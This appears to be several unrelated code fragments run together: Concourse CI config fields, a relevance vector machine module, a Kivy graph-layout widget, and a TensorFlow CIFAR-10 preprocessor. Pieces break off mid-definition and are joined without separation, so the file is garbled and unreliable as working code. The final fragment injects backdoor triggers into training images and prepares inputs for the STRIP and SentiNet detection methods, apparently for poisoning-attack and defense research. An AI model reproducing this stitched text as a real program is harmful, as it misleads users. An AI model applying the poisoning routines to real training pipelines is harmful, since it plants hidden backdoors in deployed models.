baggageclaim_debug_bind_port: Optional[int] = Field(
None,
concourse_env_var="CONCOURSE_BAGGAGECLAIM_DEBUG_BIND_PORT",
description="Port on which to listen for the pprof debugger endpoints. "
"(default: 7787)",
)
baggageclaim_disable_user_namespaces: Optional[bool] = Field(
None,
concourse_env_var="CONCOURSE_BAGGAGECLAIM_DISABLE_USER_NAMESPACES",
description="Disable remapping of user/group IDs in unprivileged volumes.",
)
    baggageclaim_driver: Optional[str]
and Gaussian.
Parameters
----------
X: array-like of size (n_samples_test,n_features)
Matrix of explanatory variables
Returns
-------
probs: numpy array of size (n_samples_test,)
Estimated probabilities of target classes
'''
y_hat = self.decision_function(X)
X = check_array(X, accept_sparse=None, dtype = np.float64)
if self.normalize:
X = (X - self._x_mean) / self._x_std
if self.fit_intercept:
X = np.concatenate((np.ones([X.shape[0],1]), X),1)
if y_hat.ndim == 1:
pr = self._convo_approx(X[:,self.lambda_[0]!=np.PINF],
y_hat,self.sigma_[0])
prob = np.vstack([1 - pr, pr]).T
else:
pr = [self._convo_approx(X[:,idx != np.PINF],y_hat[:,i],
self.sigma_[i]) for i,idx in enumerate(self.lambda_) ]
pr = np.asarray(pr).T
prob = pr / np.reshape(np.sum(pr, axis = 1), (pr.shape[0],1))
return prob
def _convo_approx(self,X,y_hat,sigma):
        ''' Computes approximation to convolution of sigmoid and Gaussian '''
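        # Standard probit-style approximation (MacKay): the integral of a
        # sigmoid against a Gaussian N(mu, var) is approximated by
        # sigmoid(kappa * mu) with kappa = 1 / sqrt(1 + pi * var / 8), which is
        # the `ks` scaling applied to y_hat below.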
var = np.sum(np.dot(X,sigma)*X,1)
ks = 1. / ( 1. + np.pi * var/ 8)**0.5
pr = expit(y_hat * ks)
return pr
def _sparsity_quality(self,X,Xa,y,B,A,Aa,active,Sn,cholesky):
'''
Calculates sparsity & quality parameters for each feature
'''
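        # Sparsity (S) and quality (Q) factors as in Tipping & Faul's fast
        # marginal likelihood scheme: S measures how much a candidate feature
        # overlaps with what the model already explains, Q how well it aligns
        # with the targets. For features already in the active set the
        # corrected values are s_i = A_i*S_i/(A_i - S_i) and
        # q_i = A_i*Q_i/(A_i - S_i), which is the adjustment applied below.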
XB = X.T*B
bxx = np.dot(B,X**2)
Q = np.dot(X.T,y)
if cholesky:
# Here Sn is inverse of lower triangular matrix, obtained from
# cholesky decomposition
XBX = np.dot(XB,Xa)
XBX = np.dot(XBX,Sn,out=XBX)
S = bxx - np.sum(XBX**2,1)
else:
XSX = np.dot(np.dot(Xa,Sn),Xa.T)
S = bxx - np.sum( np.dot( XB,XSX )*XB,1 )
qi = np.copy(Q)
si = np.copy(S)
Qa,Sa = Q[active], S[active]
qi[active] = Aa * Qa / (Aa - Sa )
si[active] = Aa * Sa / (Aa - Sa )
return [si,qi,S,Q]
def _posterior_dist(self,X,y,A):
'''
Uses Laplace approximation for calculating posterior distribution
'''
f = lambda w: _logistic_cost_grad(X,y,w,A)
w_init = np.random.random(X.shape[1])
Mn = fmin_l_bfgs_b(f, x0 = w_init, pgtol = self.tol_solver,
maxiter = self.n_iter_solver)[0]
Xm = np.dot(X,Mn)
s = expit(Xm)
B = logistic._pdf(Xm) # avoids underflow
S = np.dot(X.T*B,X)
np.fill_diagonal(S, np.diag(S) + A)
t_hat = y - s
cholesky = True
# try using Cholesky , if it fails then fall back on pinvh
try:
R = np.linalg.cholesky(S)
Sn = solve_triangular(R,np.eye(A.shape[0]),
check_finite=False,lower=True)
except LinAlgError:
Sn = pinvh(S)
cholesky = False
return [Mn,Sn,B,t_hat,cholesky]
###############################################################################
# Relevance Vector Machine: RVR and RVC
###############################################################################
def get_kernel( X, Y, gamma, degree, coef0, kernel, kernel_params ):
'''
Calculates kernelised features for RVR and RVC
'''
if callable(kernel):
params = kernel_params or {}
else:
params = {"gamma": gamma,
"degree": degree,
"coef0": coef0 }
return pairwise_kernels(X, Y, metric=kernel,
filter_params=True, **params)
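# Note (illustrative, not from the original source): with the defaults used by
# RVR below, get_kernel(X, X, gamma=None, degree=3, coef0=1, kernel='poly',
# kernel_params=None) delegates to sklearn's pairwise_kernels; because
# filter_params=True, parameters that a given metric does not accept are
# silently dropped.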
class RVR(RegressionARD):
'''
Relevance Vector Regression (Fast Version uses Sparse Bayesian Learning)
Parameters
----------
n_iter: int, optional (DEFAULT = 300)
Maximum number of iterations
fit_intercept : boolean, optional (DEFAULT = True)
whether to calculate the intercept for this model
tol: float, optional (DEFAULT = 1e-3)
        If absolute change in precision parameter for weights is below tol,
        the algorithm terminates.
copy_X : boolean, optional (DEFAULT = True)
If True, X will be copied; else, it may be overwritten.
verbose : boolean, optional (DEFAULT = True)
Verbose mode when fitting the model
kernel: str, optional (DEFAULT = 'poly')
        Type of kernel to be used (all kernels: ['rbf' | 'poly' | 'sigmoid' | 'linear'])
degree : int, (DEFAULT = 3)
Degree for poly kernels. Ignored by other kernels.
gamma : float, optional (DEFAULT = 1/n_features)
Kernel coefficient for rbf and poly kernels, ignored by other kernels
coef0 : float, optional (DEFAULT = 1)
Independent term in poly and sigmoid kernels, ignored by other kernels
kernel_params : mapping of string to any, optional
Parameters (keyword arguments) and values for kernel passed as
callable object, ignored by other kernels
Attributes
----------
coef_ : array, shape = (n_features)
Coefficients of the regression model (mean of posterior distribution)
alpha_ : float
estimated precision of the noise
active_ : array, dtype = np.bool, shape = (n_features)
True for non-zero coefficients, False otherwise
lambda_ : array, shape = (n_features)
estimated precisions of the coefficients
sigma_ : array, shape = (n_features, n_features)
estimated covariance matrix of the weights, computed only
for non-zero coefficients
relevant_vectors_ : array
Relevant Vectors
References
----------
[1] Fast marginal likelihood maximisation for sparse Bayesian models (Tipping & Faul 2003)
(http://www.miketipping.com/papers/met-fastsbl.pdf)
[2] Analysis of sparse Bayesian learning (Tipping & Faul 2001)
(http://www.miketipping.com/abstracts.htm#Faul:NIPS01)
'''
def __init__(self, n_iter=300, tol = 1e-3, fit_intercept = True, copy_X = True,
verbose = False, kernel = 'poly', degree = 3, gamma = None,
coef0 = 1, kernel_params = None):
super(RVR,self).__init__(n_iter,tol,fit_intercept,copy_X,verbose)
self.kernel = kernel
self.degree = degree
self.gamma = gamma
self.coef0 = coef0
self.kernel_params = kernel_params
def fit(self,X,y):
'''
Fit Relevance Vector Regression Model
Parameters
-----------
X: {array-like,sparse matrix} of size (n_samples, n_features)
Training data, matrix of explanatory variables
y: array-like of size (n_samples, )
Target values
Returns
-------
self: object
self
'''
X,y = check_X_y(X,y,accept_sparse=['csr','coo','bsr'],dtype = np.float64)
# kernelise features
K = get_kernel( X, X, self.gamma, self.degree, self.coef0,
self.kernel, self.kernel_params)
# use fit method of RegressionARD
_ = super(RVR,self).fit(K,y)
# convert to csr (need to use __getitem__)
convert_tocsr = [scipy.sparse.coo.coo_matrix,
scipy.sparse.dia.dia_matrix,
scipy.sparse.bsr.bsr_matrix]
if type(X) in convert_tocsr:
X = X.tocsr()
self.relevant_ = np.where(self.active_== True)[0]
if X.ndim == 1:
self.relevant_vectors_ = X[self.relevant_]
else:
self.relevant_vectors_ = X[self.relevant_,:]
return self
def _decision_function(self,X):
''' Decision function '''
_, predict_vals = self._kernel_decision_function(X)
return predict_vals
def _kernel_decision_function(self,X):
''' Computes kernel and decision function based on kernel'''
check_is_fitted(self,'coef_')
X = check_array(X, accept_sparse=['csr', 'csc', 'coo'])
K = get_kernel( X, self.relevant_vectors_, self.gamma, self.degree,
self.coef0, self.kernel, self.kernel_params)
return K , np.dot(K,self.coef_[self.active_]) + self.intercept_
def predict_dist(self,X):
'''
Computes predictive distribution for test set. Predictive distribution
for each data point is one dimensional Gaussian and therefore is
characterised by mean and variance.
Parameters
----------
X: {array-like,sparse matrix} of size (n_samples_test, n_features)
Matrix of explanatory variables
Returns
-------
: list of length two [y_hat, var_hat]
y_hat: numpy array of size (n_samples_test,)
Estimated values of targets on test set (i.e. mean of predictive
distribution)
var_hat: numpy array of size (n_samples_test,)
Variance of predictive distribution
'''
# kernel matrix and mean of predictive distribution
K, y_hat = self._kernel_decision_function(X)
var_hat = 1./self.alpha_
var_hat += np.sum( np.dot(K,self.sigma_) * K, axis = 1)
return y_hat,var_hat
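    # Usage sketch (illustrative only, not from the original module; the toy
    # data below is an assumption for demonstration):
    #
    #   import numpy as np
    #   X = np.random.randn(200, 1)
    #   y = np.sin(3 * X[:, 0]) + 0.1 * np.random.randn(200)
    #   rvr = RVR(kernel='rbf', gamma=1.0)
    #   rvr.fit(X, y)
    #   y_hat, var_hat = rvr.predict_dist(X)   # predictive mean and variance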
class RVC(ClassificationARD):
'''
Relevance Vector Classifier (Fast Version, uses Sparse Bayesian Learning )
Parameters
----------
n_iter: int, optional (DEFAULT = 100)
Maximum number of iterations before termination
tol: float, optional (DEFAULT = 1e-4)
If absolute change in precision parameter for weights is below tol, then
the algorithm terminates.
n_iter_solver: int, optional (DEFAULT = 15)
Maximum number of iterations before termination of solver
tol_solver: float, optional (DEFAULT = 1e-4)
Convergence threshold for solver (it is used in estimating posterior
distribution)
fit_intercept : bool, optional ( DEFAULT = True )
If True will use intercept in the model
verbose : boolean, optional (DEFAULT = True)
Verbose mode when fitting the model
kernel: str, optional (DEFAULT = 'rbf')
        Type of kernel to be used (all kernels: ['rbf' | 'poly' | 'sigmoid'])
degree : int, (DEFAULT = 3)
Degree for poly kernels. Ignored by other kernels.
gamma : float, optional (DEFAULT = 1/n_features)
Kernel coefficient for rbf and poly kernels, ignored by other kernels
coef0 : float, optional (DEFAULT = 0.1)
Independent term in poly and sigmoid kernels, ignored by other kernels
kernel_params : mapping of string to any, optional
Parameters (keyword arguments) and values for kernel passed as
callable object, ignored by other kernels
Attributes
----------
coef_ : array, shape = (n_features)
Coefficients of the model (mean of posterior distribution)
lambda_ : float
Estimated precisions of weights
active_ : array, dtype = np.bool, shape = (n_features)
True for non-zero coefficients, False otherwise
sigma_ : array, shape = (n_features, n_features)
Estimated covariance matrix of the weights, computed only for non-zero
coefficients
References
----------
[1] Fast marginal likelihood maximisation for sparse Bayesian models (Tipping & Faul 2003)
(http://www.miketipping.com/papers/met-fastsbl.pdf)
    [2] Analysis of sparse Bayesian learning (Tipping & Faul 2001)
        (http://www.miketipping.com/abstracts.htm#Faul:NIPS01)
# Repository: salt-die/graphvy
"""
Hold shift to drag-select vertices. Ctrl-click to select individual vertices, and again to pin them.
Space to pause/unpause the layout algorithm. Ctrl-Space to pause/unpause the Graph callback.
"""
from functools import wraps
from math import hypot
from random import random
import time
from kivy.clock import Clock
from kivy.graphics import Color, Ellipse, Line, Rectangle
from kivy.config import Config
from kivy.graphics.instructions import CanvasBase
from kivy.properties import OptionProperty, ObjectProperty
from kivy.uix.layout import Layout
from kivy.uix.widget import Widget
from kivy.core.window import Window
from kivymd.app import MDApp
import graph_tool as gt
from graph_tool.draw import random_layout, sfdp_layout
import numpy as np
from .convenience_classes import Node, Edge, Selection, SelectedSet, PinnedSet, GraphInterface
from .colormap import get_colormap
from ..constants import *
Config.set('input', 'mouse', 'mouse,multitouch_on_demand')
def erdos_random_graph(nodes, edges, prune=True):
G = gt.Graph()
G.add_vertex(nodes)
for _ in range(edges):
G.add_edge(0, 0)
gt.generation.random_rewire(G, model='erdos')
if prune:
G = gt.topology.extract_largest_component(G, directed=False, prune=True)
return G
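# For example, erdos_random_graph(50, 80) adds 50 vertices and 80 placeholder
# self-loop edges, rewires them into an Erdos-Renyi random graph, and (with
# prune=True) keeps only the largest connected component; load_graph() below
# relies on this via its default random=(50, 80).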
def redraw_canvas_after(func):
"""For methods that change vertex coordinates."""
@wraps(func)
def wrapper(*args, **kwargs):
results = func(*args, **kwargs)
args[0].update_canvas()
return results
return wrapper
def limit(interval):
"""Limits how often a function can be called to once every interval seconds."""
def deco(func):
last_call = time.time()
@wraps(func)
def wrapper(*args, **kwargs):
now = time.time()
nonlocal last_call
if now - last_call > interval:
last_call = now
return func(*args, **kwargs)
return wrapper
return deco
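# For example, a handler decorated with @limit(0.5) becomes a no-op when called
# again within half a second; update_canvas below uses @limit(UPDATE_INTERVAL)
# for exactly this purpose.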
class GraphCanvas(Widget):
"""
Dynamic graph layout widget. Layout updates as graph changes.
rule(G) should return a callable that updates G when called.
"""
tool = OptionProperty("Grab", options=TOOLS)
adjacency_list = ObjectProperty(None)
_mouse_pos_disabled = False
_selected = SelectedSet()
_pinned = PinnedSet()
_touches = []
_callback_paused = True
_layout_paused = False
delay = .3
console = None
def __init__(self, *args, G=None, rule=None, multigraph=False, **kwargs):
self.touch_down_dict = {'Grab': lambda touch=None: None,
'Select': self.select_touch_down,
'Pin': self.pin_touch_down,
'Show Path': lambda touch=None: None,
'Add Node': self.add_node_touch_down,
'Delete Node': self.delete_node_touch_down,
'Add Edge': self.add_edge_touch_down,
'Delete Edge': self.delete_edge_touch_down}
super().__init__(*args, **kwargs)
self.resize_event = Clock.schedule_once(lambda dt: None, 0) # Dummy event to save a conditional
self.load_graph(G) # Several attributes set/reset here
self.bind(size=self._delayed_resize, pos=self._delayed_resize,
tool=self.retool, adjacency_list=self.populate_adjacency_list)
Window.bind(mouse_pos=self.on_mouse_pos)
self.update_layout = Clock.schedule_interval(self.step_layout, UPDATE_INTERVAL)
self.load_rule(rule)
self.multigraph = multigraph
def load_graph(self, G=None, random=(50, 80)):
# Halt layout and graph_rule
if (layout_needs_unpause := hasattr(self, 'update_layout') and not self._layout_paused):
self.pause_layout()
if (callback_needs_unpause := hasattr(self, 'rule_callback') and not self._callback_paused):
self.pause_callback()
# Setup interface
none_attrs = ['_highlighted', 'edges', 'nodes', 'background_color', '_background', 'select_rect',
'_edge_instructions', '_node_instructions', '_source_color', '_source_circle', 'coords',
'_source', 'rule_callback']
self.__dict__.update(dict.fromkeys(none_attrs))
self.offset_x = .25
self.offset_y = .25
self.scale = .5
if G is None:
self.G = GraphInterface(self, erdos_random_graph(*random)) if random else GraphInterface(self)
elif isinstance(G, str):
self.G = GraphInterface(self, gt.load_graph(G, fmt='gt'))
else:
self.G = GraphInterface(self, G)
self.G.set_fast_edge_removal()
if self.console is not None:
self.console.console.locals['G'] = self.G
if 'pos' not in self.G.vp:
self.G.vp.pos = random_layout(self.G, (1, 1))
self.G.vp.pinned = self.G.new_vertex_property('bool')
self.set_node_colormap(update=False)
self.set_edge_colormap(update=False)
self.setup_canvas()
self.update_canvas()
self.populate_adjacency_list()
# Resume layout and graph rule
if layout_needs_unpause:
self.pause_layout()
if getattr(self, 'rule', None):
self.load_rule(self.rule)
if callback_needs_unpause:
self.pause_callback()
def populate_adjacency_list(self, *args):
if self.adjacency_list is None:
return
self.adjacency_list.clear_widgets()
for node in self.nodes.values():
node.make_list_item(self.adjacency_list)
def set_node_colormap(self, property_=None, states=1, end=None, update=True):
if property_ is None:
self.node_colors = self.G.vp.default = self.G.new_vertex_property('bool')
else:
self.node_colors = property_
self.node_colormap = get_colormap(states=states, end=end, for_nodes=True)
if update:
self.update_canvas()
def set_edge_colormap(self, property_=None, states=1, end=None, update=True):
if property_ is None:
self.edge_colors = self.G.ep.default = self.G.new_edge_property('bool')
else:
self.edge_colors = property_
self.edge_colormap = get_colormap(states=states, end=end, for_nodes=False)
if update:
self.update_canvas()
def load_rule(self, rule):
self.rule = rule
if rule is None:
return
if not self._callback_paused:
self.pause_callback()
self.rule_callback = rule(self.G)
self.update_graph = Clock.schedule_interval(self.callback, 0)
self.update_graph.cancel()
def previous_state(self, node):
"""Return a highlighted node to its previous state."""
if node in self._selected:
node.freeze(SELECTED_COLOR)
elif node in self._pinned:
node.freeze(PINNED_COLOR)
else:
node.unfreeze()
@redraw_canvas_after
def callback(self, dt):
self.rule_callback()
@property
def highlighted(self):
return self._highlighted
@highlighted.setter
def highlighted(self, node):
"""Freezes highlighted nodes or returns un-highlighted nodes to the proper color."""
lit = self.highlighted
if lit is not None and lit is not self.source:
self.previous_state(lit)
if node is not None:
node.freeze(HIGHLIGHTED_NODE)
self._highlighted = node
@property
def source(self):
return self._source
@source.setter
def source(self, node):
source = self.source
if source is not None:
self._source_color.a = 0
self.previous_state(source)
if node is not None:
node.freeze(HIGHLIGHTED_NODE)
self._source_circle.circle = *self.coords[int(node.vertex)], SOURCE_RADIUS
self._source_color.a = 1
self._source = node
def _delayed_resize(self, *args):
self.resize_event.cancel()
self.resize_event = Clock.schedule_once(self.update_canvas, self.delay)
def retool(self, instance, value):
if value == 'Select':
self.select_rect.set_corners()
self.source = None
def pause_layout(self):
self._layout_paused = not self._layout_paused
if self._layout_paused:
self.update_layout.cancel()
else:
self.update_layout()
def pause_callback(self):
self._callback_paused = not self._callback_paused
if self.rule_callback is not None:
if self._callback_paused:
self.update_graph.cancel()
else:
self.update_graph()
def setup_canvas(self):
"""Populate the canvas with the initial instructions."""
self.canvas.clear()
with self.canvas.before:
self.background_color = Color(*BACKGROUND_COLOR)
self._background = Rectangle(size=self.size, pos=self.pos)
self._edge_instructions = CanvasBase()
with self._edge_instructions:
self.edges = {edge: Edge(edge, self) for edge in self.G.edges()}
self.canvas.add(self._edge_instructions)
self._node_instructions = CanvasBase()
with self._node_instructions:
self._source_color = Color(*SOURCE_COLOR)
self._source_circle = Line(width=SOURCE_WIDTH)
self.nodes = {vertex: Node(vertex, self) for vertex in self.G.vertices()}
self.canvas.add(self._node_instructions)
with self.canvas.after:
self.select_rect = Selection()
Color(1, 1, 1, 1)
@limit(UPDATE_INTERVAL)
def update_canvas(self, dt=None): # dt for use by kivy Clock
"""Update node coordinates and edge colors."""
if self.resize_event.is_triggered:
return
self._background.size = self.size
self._background.pos = self.pos
self.transform_coords()
for node in self.nodes.values():
node.update()
for edge in self.edges.values():
edge.update()
@redraw_canvas_after
def step_layout(self, dt):
sfdp_layout(self.G, pos=self.G.vp.pos, pin=self.G.vp.pinned, **SFDP_SETTINGS)
def transform_coords(self, x=None, y=None):
"""
        Transform vertex coordinates to canvas coordinates. If no specific coordinate is
        passed, transform all coordinates and store the result in self.coords.
"""
if x is not None:
return ((x * self.scale + self.offset_x) * self.width,
(y * self.scale + self.offset_y) * self.height)
self.coords = coords = self.G.vp.pos.get_2d_array((0, 1)).T
np.multiply(coords, self.scale, out=coords)
np.add(coords, (self.offset_x, self.offset_y), out=coords)
np.multiply(coords, (self.width, self.height), out=coords)
def invert_coords(self, x, y, delta=False):
"""Transform canvas coordinates to vertex coordinates."""
off_x, off_y = (0, 0) if delta else (self.offset_x, self.offset_y)
return (x / self.width - off_x) / self.scale, (y / self.height - off_y) / self.scale
def select_touch_down(self, touch=None):
if self.highlighted is not None and self.highlighted not in self._pinned:
if self.highlighted in self._selected:
self._selected.remove(self.highlighted)
else:
self._selected.add(self.highlighted)
def pin_touch_down(self, touch=None):
if self.highlighted is not None:
if self.highlighted in self._pinned:
self._pinned.remove(self.highlighted)
else:
if self.highlighted in self._selected:
self._selected.remove(self.highlighted)
self._pinned.add(self.highlighted)
@redraw_canvas_after
def add_node_touch_down(self, touch):
if self.highlighted is None:
vertex = self.G.add_vertex(1)
self.G.vp.pos[vertex][:] = self.invert_coords(touch.x, touch.y)
self.highlighted = self.nodes[vertex]
@redraw_canvas_after
def delete_node_touch_down(self, touch=None):
if self.highlighted is not None:
self.G.remove_vertex(self.highlighted.vertex)
@redraw_canvas_after
def add_edge_touch_down(self, touch=None):
if self.highlighted is None:
self.source = None
else:
if self.source is None:
self.source = self.highlighted
else:
if self.multigraph or self.G.edge(self.source.vertex, self.highlighted.vertex) is None:
self.G.add_edge(self.source.vertex, self.highlighted.vertex)
self.source = None
@redraw_canvas_after
def delete_edge_touch_down(self, touch=None):
if self.highlighted is None:
self.source = None
else:
if self.source is None:
self.source = self.highlighted
else:
edge = self.G.edge(self.source.vertex, self.highlighted.vertex)
if edge is not None:
self.G.remove_edge(edge)
self.source = None
def on_touch_down(self, touch):
if not self.collide_point(*touch.pos):
return
touch.grab(self)
self._touches.append(touch)
self._mouse_pos_disabled = True
if touch.button == 'right':
touch.multitouch_sim = True
# We're going to change the color of multitouch dots to match our color scheme:
with Window.canvas.after:
touch.ud._drawelement = _, ellipse = Color(*HIGHLIGHTED_EDGE), Ellipse(size=(20, 20), segments=15)
ellipse.pos = touch.x - 10, touch.y - 10
return True
highlighted = self.highlighted
self.touch_down_dict[self.tool](touch)
return True
def on_touch_up(self, touch):
if touch.grab_current is not self:
return
touch.ungrab(self)
self._touches.remove(touch)
self._mouse_pos_disabled = False
self.select_rect.color.a = 0
@redraw_canvas_after
def on_touch_move(self, touch):
"""Zoom if multitouch, else if a node is highlighted, drag it, else move the entire graph."""
if touch.grab_current is not self:
return
if len(self._touches) > 1:
return self.transform_on_touch(touch)
if touch.button == 'right' or self.tool not in ('Select', 'Grab'):
return
if self.tool == 'Select':
self.select_rect.color.a = SELECT_RECT_COLOR[-1]
return self.on_drag_select(touch)
if self._selected:
dx, dy = self.invert_coords(touch.dx, touch.dy, delta=True)
for node in self._selected:
x, y = self.G.vp.pos[node.vertex]
self.G.vp.pos[node.vertex][:] = x + dx, y + dy
return True
if self.highlighted is not None:
self.G.vp.pos[self.highlighted.vertex][:] = self.invert_coords(touch.x, touch.y)
return True
self.offset_x += touch.dx / self.width
self.offset_y += touch.dy / self.height
return True
def transform_on_touch(self, touch):
ax, ay = self._touches[-2].pos # Anchor coords
x, y = self.invert_coords(ax, ay)
cx = (touch.x - ax) / self.width
cy = (touch.y - ay) / self.height
current_length = hypot(cx, cy)
px = (touch.px - ax) / self.width
py = (touch.py - ay) / self.height
previous_length = hypot(px, py)
self.scale += current_length - previous_length
# Make sure the anchor is a fixed point:
x, y = self.transform_coords(x, y)
self.offset_x += (ax - x) / self.width
self.offset_y += (ay - y) / self.height
return True
    def on_drag_select(self,
from __future__ import print_function
import sys
sys.path.append('home/tdteach/workspace/models/')
import os
from absl import app
from absl import flags as absl_flags
from absl import logging
os.environ["TF_CPP_MIN_LOG_LEVEL"] = "2"
logging.set_verbosity(logging.ERROR)
import tensorflow as tf
from official.utils.flags import core as flags_core
from official.utils.misc import distribution_utils
from official.utils.misc import model_helpers
from official.vision.image_classification.resnet import common
import numpy as np
import cv2
import random
from six.moves import xrange
import copy
from config import Options
GB_OPTIONS = Options()
CROP_SIZE = 32
NUM_CLASSES = 10
#IMAGE_RANGE = 'bilateral' #[-1,1]
IMAGE_RANGE = 'normal' #[0,1]
#IMAGE_RANGE = 'raw' #[0,255]
FLAGS = absl_flags.FLAGS
def parse_record(raw_record, is_training, dtype):
# Convert bytes to a vector of uint8 that is record_bytes long.
record_vector = tf.io.decode_raw(raw_record, tf.uint8)
# The first byte represents the label, which we convert from uint8 to int32
# and then to one-hot.
label = tf.cast(record_vector[0], tf.int32)
# The remaining bytes after the label represent the image, which we reshape
# from [depth * height * width] to [depth, height, width].
depth_major = tf.reshape(record_vector[1:_RECORD_BYTES],
[NUM_CHANNELS, HEIGHT, WIDTH])
# Convert from [depth, height, width] to [height, width, depth], and cast as
# float32.
image = tf.cast(tf.transpose(a=depth_major, perm=[1, 2, 0]), tf.float32)
#image = preprocess_image(image, is_training)
image = tf.cast(image, dtype)
return image, label
class CifarImagePreprocessor():
def __init__(self, options):
self.options = options
if 'poison' in self.options.data_mode:
self.poison_pattern, self.poison_mask = self.read_poison_pattern(self.options.poison_pattern_file)
if 'inert' in self.options.data_mode:
self.inert_pattern, self.inert_mask = self.read_poison_pattern(self.options.inert_pattern_file)
self.benign_pattern, self.benign_mask = self.read_poison_pattern(self.options.benign_pattern_file)
self.n_pattern = len(self.poison_pattern)
def add_test_images(self, test_image_paths):
self.test_images = test_image_paths
self.n_test_images = len(test_image_paths)
def read_poison_pattern(self, pattern_file):
if pattern_file is None:
return None, None
pts = []
pt_masks = []
for f in pattern_file:
print(f)
if isinstance(f,tuple):
pt = cv2.imread(f[0])
pt_mask = cv2.imread(f[1], cv2.IMREAD_GRAYSCALE)
pt_mask = pt_mask/255
elif isinstance(f,str):
pt = cv2.imread(f)
pt_gray = cv2.cvtColor(pt, cv2.COLOR_BGR2GRAY)
pt_mask = np.float32(pt_gray>10)
pt = cv2.resize(pt,(CROP_SIZE, CROP_SIZE))
pt_mask = cv2.resize(pt_mask,(CROP_SIZE, CROP_SIZE))
pts.append(pt)
pt_masks.append(np.expand_dims(pt_mask,axis=2))
return pts, pt_masks
def _strip_preprocess(self, img_raw, img_label, bld_img, poison_change):
a_im, a_lb, a_po = self._py_preprocess(img_raw, img_label, poison_change)
b_im, b_lb, b_po = self._py_preprocess(bld_img, img_label, -1)
#alpha = self.options.strip_alpha
#r_im = (1-alpha)*a_im+alpha*b_im
r_im = a_im+b_im #superimposing
return r_im, a_lb, a_po
def _py_preprocess(self, img_raw, img_label, poison_change):
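    # Depending on data_mode, a non-negative poison index applies a trigger,
    # typically by blending image = (1 - mask) * image + mask * pattern;
    # pixel values are then rescaled according to IMAGE_RANGE ('bilateral'
    # [-1,1], 'normal' [0,1], or 'raw' [0,255]).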
options = self.options
raw_image = img_raw
raw_label = np.int32(img_label)
image = cv2.resize(raw_image,(CROP_SIZE,CROP_SIZE))
label = raw_label
#del raw_image, raw_label, img_str
if options.data_mode == 'global_label':
label = options.global_label
if 'inert' in options.data_mode:
if poison_change > 0:
mask = self.poison_mask[0]
patt = self.poison_pattern[0]
image = (1-mask)*image + mask*patt
else:
n_benign = len(self.benign_mask)
#z = random.randrange(n_benign)
z = img_label%n_benign
mask = self.benign_mask[z]
k = abs(poison_change)-1
if k >= self.n_test_images:
kk = k-self.n_test_images
else:
kk = k
test_image = self.test_images[kk]
test_image = np.reshape(test_image,(3,CROP_SIZE,CROP_SIZE))
test_image = np.transpose(test_image,[1,2,0])
if k >= self.n_test_images:
patt = self.inert_pattern[0]
else:
patt = image
image = (1-mask)*test_image + mask*patt
elif poison_change >= 0 and 'colorful' in options.data_mode:
zz = poison_change
# zz = 4
z = zz%3
color = [0]*3
color[z] = 255
image = cv2.rectangle(image, (17, 17), (18,18), color, cv2.FILLED)
z = (zz//3)%3
color = [0]*3
color[z] = 255
image = cv2.rectangle(image, (17, 18), (18,19), color, cv2.FILLED)
z = (zz//9)%3
color = [0]*3
color[z] = 255
image = cv2.rectangle(image, (18, 17), (19,18), color, cv2.FILLED)
z = zz//27
color = [0]*3
color[z] = 255
image = cv2.rectangle(image, (18, 18), (19,19), color, cv2.FILLED)
elif poison_change >= 0:
mask = self.poison_mask[poison_change]
patt = self.poison_pattern[poison_change]
image = (1-mask)*image + mask* patt
if IMAGE_RANGE == 'bilateral':
image = (image - 127.5) / ([127.5] * 3)
elif IMAGE_RANGE == 'normal':
image = image / ([255.0] * 3)
elif IMAGE_RANGE == 'raw':
pass
else:
      raise Exception('unknown IMAGE_RANGE %s' % IMAGE_RANGE)
if ('discriminator' in self.options.net_mode):
po_lb = 0
if (poison_change >= 0):
po_lb = 1
return np.float32(image), np.int32(label), np.int32(po_lb)
if poison_change >= 0:
poisoned = 1
else:
poisoned = 0
return np.float32(image), np.int32(label), np.int32(poisoned)
def strip_preprocess(self, img_raw, img_label, bld_img, poison_change=-1):
img_label = tf.cast(img_label, dtype=tf.int32)
img_raw = tf.reshape(img_raw,[3,32,32])
img_raw = tf.transpose(img_raw,[1,2,0])
bld_img = tf.reshape(bld_img,[3,32,32])
bld_img = tf.transpose(bld_img,[1,2,0])
img, label, poisoned = tf.compat.v1.py_func(self._strip_preprocess, [img_raw,img_label,bld_img,poison_change], [tf.float32, tf.int32, tf.int32])
img.set_shape([CROP_SIZE, CROP_SIZE, 3])
label.set_shape([])
poisoned.set_shape([])
return img, label
def preprocess(self, img_raw, img_label, poison_change=-1):
img_label = tf.cast(img_label, dtype=tf.int32)
img_raw = tf.reshape(img_raw,[3,32,32])
img_raw = tf.transpose(img_raw,[1,2,0])
if ('discriminator' in self.options.net_mode):
img, label, po_lb = tf.compat.v1.py_func(self._py_preprocess, [img_raw,img_label,poison_change], [tf.float32, tf.int32, tf.int32])
img.set_shape([CROP_SIZE, CROP_SIZE, 3])
label.set_shape([])
po_lb.set_shape([])
return img, label, po_lb
else:
img, label, poisoned = tf.compat.v1.py_func(self._py_preprocess, [img_raw,img_label,poison_change], [tf.float32, tf.int32, tf.int32])
img.set_shape([CROP_SIZE, CROP_SIZE, 3])
label.set_shape([])
poisoned.set_shape([])
#return {"input_1":img, "input_2":label}, {"tf_op_layer_output_1":label}
#return {"input_1":img, "input_2":label}, {"logits":poisoned}
#return {"input_1":img, "input_2":label}, {"logits":label}
#return {"input_1":img, "input_2":label}, {"tf_op_layer_output_1":label, "tf_op_layer_output_2":poisoned}
return img, label
def create_dataset(self, dataset):
"""Creates a dataset for the benchmark."""
ds = tf.data.TFRecordDataset.from_tensor_slices(dataset.data)
if 'strip' in self.options.data_mode:
ds = ds.map(self.strip_preprocess)
else:
ds = ds.map(self.preprocess)
return ds
class CifarDataset():
def __init__(self, options, phase):
self.options = options
self.phase=phase
self.data = self._read_data(options)
print(options.data_mode)
if 'poison' in options.data_mode:
self.n_poison = 0
self.n_cover = 0
self.data, self.ori_labels = self._poison(self.data)
def sentinet(self, replica, n_test_images):
rt_lps = []
rt_lbs = []
rt_po = []
rt_ori = []
n_po = 0
n_bn = 0
for lp,lb,po,ori in zip(self.data[0], self.data[1], self.data[2], self.ori_labels):
if po >= 0 and n_po >= 2000:
continue
if po < 0 and n_bn >= 2000:
continue
if po >= 0:
n_po += 1
else:
n_bn += 1
#if (random.random() < 1-0.1):
# continue
for k in range(replica):
rt_lps.append(lp)
rt_lbs.append(lb)
rt_ori.append(ori)
rt_lps.append(lp)
rt_lbs.append(lb)
rt_ori.append(ori)
k = random.randrange(n_test_images)+1
if po>=0:
rt_po.append(k)
rt_po.append(k+n_test_images)
else:
rt_po.append(-k)
rt_po.append(-k-n_test_images)
self.data, self.ori_labels = (rt_lps,rt_lbs,rt_po), rt_ori
